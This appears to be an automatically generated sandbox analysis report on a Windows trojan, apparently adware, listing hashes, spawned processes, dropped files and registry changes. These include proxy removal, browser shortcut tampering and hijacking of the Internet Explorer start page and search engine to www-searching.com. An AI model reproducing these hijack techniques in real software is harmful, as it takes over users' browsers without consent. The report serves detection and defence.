HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.746779 (B) (Emsisoft), Gen:Variant.Kazy.746779 (AdAware), mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 16f4b6f13e3e20e37edf9403c894fe80
SHA1: 73429446915087ec7b4ae2cc5a68f13f9d3c0150
SHA256: 294883e4d17afba42cfd8dddbbbdca386d1ce67e25bd743e75deb07fb4c592f9
SSDeep: 24576:qTJMjonewo QkE3pGq/g8LaGCCmH/u pvFfU jEBbTr/:YeDwoFk0pfLPCCmH/dlFxEBbTr/
Size: 1085952 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-10-10 06:19:11
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
smu.exe:2540
smu.exe:3356
sma.exe:308
sma.exe:4008
sma.exe:3164
sma.exe:3192
%original file name%.exe:3380
%original file name%.exe:264
smp.exe:3444
smp.exe:2836
tcpsvcs.exe:3488
tcpsvcs.exe:1504
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process smu.exe:2540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)
The process smu.exe:3356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Temp\Pre83CF.tmp (601 bytes)
C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)
C:\Windows\Temp\Pre93AB.tmp (601 bytes)
C:\Windows\Temp\Web93AC.tmp (63 bytes)
C:\Windows\Temp\Pre83E0.tmp (601 bytes)
C:\Windows\Temp\Web83D0.tmp (63 bytes)
C:\Windows\Temp\Web83E1.tmp (63 bytes)
The Trojan deletes the following file(s):
C:\Windows\Temp\Pre93AB.tmp (0 bytes)
C:\Windows\Temp\Pre83CF.tmp (0 bytes)
C:\Windows\Temp\Pre83E0.tmp (0 bytes)
The process %original file name%.exe:3380 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_13704\%original file name%.exe (7433 bytes)
The process %original file name%.exe:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Installytd_6828\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll (1192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_9822\%original file name%.exe (7433 bytes)
The process smp.exe:3444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
The process smp.exe:2836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (1 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Search.lnk (1 bytes)
The process tcpsvcs.exe:3488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\search-metadata.json (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Preferences (11028 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\searchplugins\smod.xml (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (9416 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (388 bytes)
The process tcpsvcs.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (7392 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (12 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF8.tmp (245963 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smp.exe (6584 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EFA.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsc6EE8.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (0 bytes)
Registry activity
The process smu.exe:2540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "40 CB 63 41 C7 74 17 84 EA 5E F9 24 AE E1 DA 8A"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Wow6432Node\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Spt" = "1B 39 48 C8 E0 BD 90 00 51 86 E1 DD 14 43 97 BC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "80 46 55 E5 90 D4 4A C0 31 0A 29 D6 59 11 73 09"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process smu.exe:3356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Rlt" = "Type: REG_QWORD, Length: 8"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "46 A0 C0 5B 56 BA 84 71 70 9D 4F 8D 92 7C EE 47"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Ult" = "Type: REG_QWORD, Length: 8"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sma.exe:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"FileTracingMask" = "4294901760"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sma.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sma.exe:3164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sma.exe:3192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{E549E976-C5F2-4E77-819D-55BC9B7C25BC}"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0C 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\SearchModulePlus\Success]
"Install" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\SearchModulePlus\Success]
"InstallStr" = "ok"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process smp.exe:3444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
The process smp.exe:2836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesVersion" = "2"
"Favorites" = "00 7C 01 00 00 14 00 1F 80 C8 27 34 1F 10 5C 10"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"@zipfldr.dll,-10148" = "Compressed (zipped) folder"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesChanges" = "9"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32]
"FXSRESM.dll,-120" = "Fax recipient"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesResolve" = "CC 02 00 00 4C 00 00 00 01 14 02 00 00 00 00 00"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
"@sendmail.dll,-21" = "Desktop (create shortcut)"
"@sendmail.dll,-4" = "Mail recipient"
The process tcpsvcs.exe:3488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"
"URL" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"(Default)" = "Type: REG_SZ, Length: 0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURLFallback" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"SuggestionsURLFallback" = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE8SSC&market={language}"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"DisplayName" = "Search Module"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"DisplayName" = "Bing"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"URL" = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"SuggestionsURLFallback" = "http://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"TopResultURLFallback" = "http://www.bing.com/search?q={searchTerms}&src=ie9tr"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www-searching.com/?pid=s&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&vp=ch&prd=set"
[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www-searching.com/favicon.ico"
"SuggestionsURL" = "http://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}"
